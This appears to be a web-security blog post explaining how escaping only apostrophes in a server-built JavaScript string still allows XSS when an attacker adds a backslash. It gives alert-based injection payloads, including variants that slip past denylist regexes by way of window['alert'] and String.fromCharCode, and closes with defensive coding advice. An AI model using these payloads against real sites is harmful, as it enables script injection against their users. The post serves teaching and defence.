Escape from Normality

John Carpenter fans know the only way you’ll escape from New York is if Snake Plissken is there to get you out. When it comes to web security, don’t bother waiting for Kurt Russell’s help. You’re on your own.

And if you’re dealing with escape characters in JavaScript strings, you’ll want to make sure your application is a maximum security environment.

Imagine an app with a search function. It takes a form field named q and, instead of writing the search term into the field’s value attribute in the HTML, it sets the value with a one-line JavaScript call. Normally, you’d expect an app to just rewrite the <input> field like so:

<input id="searchResult" type="text" name="q" value="abc">

It’s not necessarily a bad idea to update the element’s value with JavaScript. Building HTML with string concatenation is a notorious vector for XSS. Writing the value with JavaScript might be more secure than rebuilding the HTML every time because the assignment avoids several encoding problems. This works if you’re keeping the HTML static and trading JSON messages with the server.
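
As a rough sketch of that safer pattern, assume the server returns a JSON message shaped like {"q": "..."} (a hypothetical format, not taken from the target app). The client parses the message and assigns the property directly. A plain object stands in for the <input> element so the snippet also runs outside a browser.

```javascript
// Hypothetical helper: apply a JSON message from the server to a field.
// `field` is anything with a `value` property, such as the element returned
// by document.getElementById('searchResult') in a browser.
function applySearchTerm(field, jsonText) {
  const message = JSON.parse(jsonText); // parsed as data, never executed as code
  field.value = String(message.q);      // property assignment, no HTML or JS parsing
  return field;
}

// Stand-in for the <input> element (assumption for running under Node.js).
const fakeInput = { value: '' };
const serverMessage = JSON.stringify({ q: String.raw`abc\';alert(9)//` });

applySearchTerm(fakeInput, serverMessage);
console.log(fakeInput.value); // the payload is stored as inert text
```

The search term never passes through string concatenation into HTML or script source, so there's no delimiter for it to break out of.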

On the other hand, if you move the server-side string concatenation from the <input> field to a <script> tag, then you’ve shifted the XSS problem to a different vector. In our target app, the <input> field’s value was delimited with quotation marks ("). The JavaScript code uses apostrophes (') to delimit the string, as follows:

<script>
document.getElementById('searchResult').value = 'abc';
</script>

Rather than strip apostrophes from the search variable’s value, the developers decided to escape them with backslashes. Here’s how it’s expected to work when a user searches for abc'.

document.getElementById('searchResult').value = 'abc\'';

Escaping the payload’s apostrophe preserves the original string delimiters, prevents the JavaScript syntax from being manipulated, and blocks HTML injection attacks – so it seems.
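
The app's server-side code isn't shown, so the following is only a guess at its shape. The function names naiveEscape and renderScript are hypothetical; the point is that the escaping step touches apostrophes and nothing else.

```javascript
// Assumed reconstruction of the developers' approach (names are hypothetical).
function naiveEscape(term) {
  // Escapes apostrophes only. Backslashes pass through untouched.
  return term.replace(/'/g, "\\'");
}

// Concatenates the escaped term into the script source sent to the browser.
function renderScript(term) {
  return "document.getElementById('searchResult').value = '" + naiveEscape(term) + "';";
}

console.log(renderScript("abc'"));
// document.getElementById('searchResult').value = 'abc\'';
```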

What if the escape is escaped? Perhaps by throwing a backslash of your own into a search term like abc\'.

document.getElementById('searchResult').value = 'abc\\'';

The developers caught the apostrophe, but missed the backslash. When JavaScript tokenizes the string it sees the escape working on the second backslash instead of the apostrophe. This corrupts the syntax, as follows:

//            ⬇ end of string token
value = 'abc\\'';
//             ⬆ dangling apostrophe
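
One way to confirm the broken syntax without a browser is to hand the generated source to the Function constructor, which compiles it but doesn't run it. This sketch assumes the same apostrophe-only escaping; escapeApostrophes and parses are hypothetical names.

```javascript
// Assumed apostrophe-only escaping, standing in for the app's server code.
function escapeApostrophes(term) {
  return term.replace(/'/g, "\\'");
}

// Returns true when the generated assignment is valid JavaScript.
// new Function() only compiles the source here; nothing is executed.
function parses(term) {
  const source = "var value = '" + escapeApostrophes(term) + "';";
  try {
    new Function(source);
    return true;
  } catch (err) {
    if (err instanceof SyntaxError) return false;
    throw err;
  }
}

console.log(parses("abc'"));            // true: the escaped apostrophe stays inside the string
console.log(parses(String.raw`abc\'`)); // false: the string ends early, leaving a dangling apostrophe
```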

From here we just start throwing HTML injection payloads against the app. JavaScript interprets \\ as a single backslash, accepts the apostrophe as the string terminator, and parses the rest of our payload.

https://web.site/search?q=abc\';alert(9)//

document.getElementById('searchResult').value = 'abc\\';alert(9)//';
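
To watch the payload run, here's a small harness under the same assumed apostrophe-only escaping. A stub named fakeAlert (hypothetical) is passed in as alert, so the snippet records the call instead of popping up a dialog.

```javascript
// Assumed apostrophe-only escaping, standing in for the app's server code.
function escapeApostrophes(term) {
  return term.replace(/'/g, "\\'");
}

// Stub that records calls instead of opening a dialog.
const calls = [];
const fakeAlert = (arg) => { calls.push(arg); };

const payload = String.raw`abc\';alert(9)//`;
const source = "var value = '" + escapeApostrophes(payload) + "';";

console.log(source); // var value = 'abc\\';alert(9)//';

// Run the generated source with the stub bound to the name `alert`.
new Function('alert', source)(fakeAlert);
console.log(calls); // [ 9 ]
```

The trailing // in the payload comments out the leftover apostrophe and semicolon, which is why the statement parses cleanly.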

JavaScript’s semantics are lovely from an attacker’s perspective. Here’s an example payload using the String concatenation operator (+) to glue the alert function to the value:

https://web.site/search?q=abc\'%2balert(9)//

document.getElementById('searchResult').value = 'abc\\'+alert(9)//';

Or we could try a payload that uses the modulo operator (%) between the String and our alert.

abc\'%alert(9)//
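
Both operator payloads work for the same reason: JavaScript has to evaluate the right-hand operand before it can compute the result, so the function call happens regardless of what the final value turns out to be. A sketch with a stubbed alert (the run helper is hypothetical):

```javascript
// Evaluates an expression with a stubbed alert and reports what happened.
function run(expression) {
  const calls = [];
  const fakeAlert = (arg) => { calls.push(arg); };
  const value = new Function('alert', 'return ' + expression)(fakeAlert);
  return { value, calls };
}

// What the page contains after apostrophe-only escaping of each payload.
const plus = run(String.raw`'abc\\'+alert(9)//';`);
const mod = run(String.raw`'abc\\'%alert(9)//';`);

console.log(plus.calls, plus.value); // [ 9 ] abc\undefined
console.log(mod.calls, mod.value);   // [ 9 ] NaN
```

The assigned value ends up as garbage, but by then the injected call has already run.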

Maybe the developers added the alert function to a denylist, e.g. with a regex like alert\( that looks for the name followed by an opening parenthesis. In that case, call the function via the window object’s property list. The name now appears as an innocuous string that naive regexes won’t flag:

abc\'%window["alert"](9)//
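
Here's roughly how that plays out against such a filter. The regex below is an assumption about what a naive denylist might look like, not the app's actual rule.

```javascript
// Hypothetical denylist: the word "alert" immediately followed by "(".
const callDenylist = /alert\(/;

const direct = String.raw`abc\'%alert(9)//`;
const indirect = String.raw`abc\'%window["alert"](9)//`;

console.log(callDenylist.test(direct));   // true: the filter catches the plain call
console.log(callDenylist.test(indirect)); // false: "alert" is followed by a quote, not "("
```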

What if the denylist blocks the word alert altogether? Build the string character by character:

abc\'%window[String.fromCharCode(0x61,0x6c,0x65,0x72,0x74)](9)//
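
A quick check of that trick, again against an assumed filter. The fakeWindow object is a hypothetical stand-in for the browser's window so the lookup can run under Node.js.

```javascript
// The character codes spell out the function name at runtime.
const builtName = String.fromCharCode(0x61, 0x6c, 0x65, 0x72, 0x74);
console.log(builtName); // alert

// Hypothetical denylist that rejects the word anywhere in the input.
const wordDenylist = /alert/i;
const obfuscated = String.raw`abc\'%window[String.fromCharCode(0x61,0x6c,0x65,0x72,0x74)](9)//`;
console.log(wordDenylist.test(obfuscated)); // false: the word never appears in the payload

// Stand-in for window: the computed name resolves to the same property.
const fakeWindow = { alert: (n) => 'alert called with ' + n };
console.log(fakeWindow[builtName](9)); // alert called with 9
```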

By now we’ve turned an evasion of an escaped apostrophe into an exercise in obfuscation and filter bypasses. These examples focused on all the permutations of escape sequences in JavaScript strings. Check out the HIQR for more anti-regex patterns and JavaScript obfuscation techniques.

A few additional tips when defending against the payloads:

In code reviews, be suspicious of string concatenation. Use safer methods to bind user-supplied data to HTML.
If you create output encoding methods rather than relying on frameworks like React, make sure they match the DOM context where the data will be written.
Normalize data before operating on it, whether this entails character set conversion, character encoding, substitution, or removal.
Apply security checks after normalization, preferring inclusion lists over exclusion lists – it’s a lot easier to guess what’s safe than assume what’s dangerous.
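
To make those tips concrete, here's one conservative sketch for the JavaScript string context used by the target app. Everything in it is an assumption for illustration: the allowlist pattern, the 100-character limit, and the function names. It normalizes first, checks against an inclusion list, and encodes every non-alphanumeric code unit as a \uXXXX escape so that apostrophes, backslashes, and < can't end the string or the script block.

```javascript
// Hypothetical inclusion list: letters, digits, spaces, and a few marks.
const SAFE_TERM = /^[\p{L}\p{N} .,_-]{1,100}$/u;

// Normalize first so that later checks see the final form of the data.
function normalizeTerm(raw) {
  return String(raw).normalize('NFKC').trim();
}

function isAllowed(term) {
  return SAFE_TERM.test(term);
}

// Encode for a JavaScript string literal: anything outside [A-Za-z0-9]
// becomes a \uXXXX escape, one per UTF-16 code unit.
function encodeForJsString(text) {
  let out = '';
  for (let i = 0; i < text.length; i++) {
    const ch = text[i];
    out += /[A-Za-z0-9]/.test(ch)
      ? ch
      : '\\u' + text.charCodeAt(i).toString(16).padStart(4, '0');
  }
  return out;
}

const hostile = normalizeTerm(String.raw`abc\';alert(9)//`);
console.log(isAllowed(hostile));         // false: rejected by the inclusion list
console.log(encodeForJsString(hostile)); // abc\u005c\u0027\u003balert\u00289\u0029\u002f\u002f
```

Even if a term slips past validation, the encoded form decodes back to the original text inside the string literal rather than being parsed as code.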

Normalization is an important first step. Any time you transform data you should reapply security checks. Snake Plissken was never one for offering advice. Instead, think of The Hitchhiker’s Guide to the Galaxy and recall Trillian’s report as the Infinite Improbability Drive powers down (p. 61):

…we have normality, I repeat we have normality….Anything you still can’t cope with is therefore your own problem.

Good luck with normality and trying to correctly escape data. Security isn’t a certainty, but one thing is, at least according to Queen – there’s “no escape from reality.”